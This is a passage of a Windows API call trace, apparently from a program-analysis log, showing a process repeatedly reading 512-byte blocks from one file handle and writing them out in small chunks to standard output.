lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.080] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.080] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.081] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.081] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.082] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.082] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.083] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.083] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] GetFileType (hFile=0x4c) returned 0x1 [0115.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.084] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.084] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.084] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.085] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.085] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.086] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.086] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.086] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.087] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.087] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] GetFileType (hFile=0x4c) returned 0x1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.087] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] GetFileType (hFile=0x4c) returned 0x1 [0115.088] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.088] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: 